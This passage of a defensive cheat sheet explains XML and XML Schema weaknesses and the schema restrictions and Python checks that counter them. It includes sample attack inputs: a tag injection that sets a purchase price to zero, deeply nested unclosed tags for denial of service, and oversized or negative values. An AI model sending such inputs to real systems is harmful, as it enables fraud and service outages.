Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities that rely on documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution as soon as it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, measure the time taken to process a regular XML document and compare it with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will replace the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version. Although the result is well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and adds a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element with the value 0. The final step to keep the structure well formed is to open a new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters; use a data type designed for that purpose instead. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the element valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was validated by application code rather than against the proposed sample schema.&lt;br /&gt;
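&lt;br /&gt;
When a value like this is checked in application code, the whole string should be validated, not only its first portion. The following Python sketch shows one way to do that with the standard &amp;lt;tt&amp;gt;base64&amp;lt;/tt&amp;gt; module. The helper name &amp;lt;tt&amp;gt;is_strict_base64&amp;lt;/tt&amp;gt; and the sample values are hypothetical, and the check is an assumption about what an application may want; it is not identical to the lexical rules of the schema data type.&lt;br /&gt;
```python
import base64
import binascii

def is_strict_base64(text):
    """Return True only if the whole string decodes as base64."""
    try:
        # validate=True rejects characters outside the base64 alphabet
        # instead of silently discarding them.
        base64.b64decode(text, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False

print(is_strict_base64("aGVsbG8="))                # a valid value
print(is_strict_base64("aGVsbG8= trailing junk"))  # junk after the value
```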
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. To avoid this logic flaw, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
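&lt;br /&gt;
The effect of a negative quantity on &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt; can be illustrated with a short Python sketch. The function name &amp;lt;tt&amp;gt;total_price&amp;lt;/tt&amp;gt; is hypothetical; it only mirrors, on the application side, the intent of restricting the element to positive integers.&lt;br /&gt;
```python
from decimal import Decimal

def total_price(price, quantity):
    """Compute price*quantity, accepting only positive whole quantities."""
    if not isinstance(quantity, int) or isinstance(quantity, bool):
        raise ValueError("quantity must be an integer")
    if not quantity > 0:
        raise ValueError("quantity must be greater than zero")
    return price * quantity

# Without the check, a negative quantity yields a negative total.
print(Decimal("10") * -5)

# With the check, only positive quantities are processed.
print(total_price(Decimal("10"), 1))
```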
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML schemas provide data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a schema uses any other type of restriction that still admits zero, you may be able to trigger an error by supplying zero as the denominator.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly chosen for elements that should hold only real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Because Infinity and NaN are not valid values for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, a price set to either of them will fail validation and never reach the application. If those values were allowed, an attacker could exploit this issue.&lt;br /&gt;
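&lt;br /&gt;
The same problem exists in application code, as the following Python sketch suggests. The helper &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is hypothetical and only approximates the intent of the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type by rejecting the special values; it is not a full validator for that type.&lt;br /&gt;
```python
from decimal import Decimal, InvalidOperation

def parse_price(text):
    """Return a finite Decimal or raise ValueError."""
    try:
        value = Decimal(text)
    except InvalidOperation:
        raise ValueError("not a decimal number: %r" % (text,)) from None
    # Python's Decimal also understands NaN and Infinity, so they
    # must be rejected explicitly.
    if not value.is_finite():
        raise ValueError("special value not allowed: %r" % (text,))
    return value

# float() accepts the special values, and every comparison with NaN
# is false, so a simple limit check does not catch it.
total = float("NaN") * 3
print(total > 1000)    # False
print(1000 >= total)   # False

print(parse_price("10.50"))
```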
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where only values of one specific length are valid (say, 8 characters), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
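&lt;br /&gt;
An application that cannot rely on schema validation may apply equivalent checks itself. The following Python sketch uses the bounds from the two examples above; the function names are hypothetical.&lt;br /&gt;
```python
def has_valid_length(value, min_length=3, max_length=256):
    """Mimic minLength/maxLength: both bounds are inclusive."""
    return len(value) in range(min_length, max_length + 1)

def has_exact_length(value, length=8):
    """Mimic the length restriction: exactly this many characters."""
    return len(value) == length

print(has_valid_length("Al"))           # too short
print(has_valid_length("John Doe"))     # within bounds
print(has_valid_length("A" * 1000000))  # too long
print(has_exact_length("ABCDEFGH"))     # exactly 8 characters
```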
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
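&lt;br /&gt;
The same expression can be tested outside a schema validator. The following Python sketch is an illustration with a hypothetical function name. XML Schema patterns must match the whole value, so the sketch uses &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; rather than a partial search.&lt;br /&gt;
```python
import re

# Same expression as in the pattern restriction above.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")

def is_valid_ssn(value):
    """Accept the value only if the entire string matches the pattern."""
    return SSN_PATTERN.fullmatch(value) is not None

print(is_valid_ssn("123-45-6789"))
print(is_valid_ssn("123-45-6789 OR 1=1"))
```
A partial match would accept the second value because it starts with a valid SSN, which is why matching the entire string matters.&lt;br /&gt;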
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will never be zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
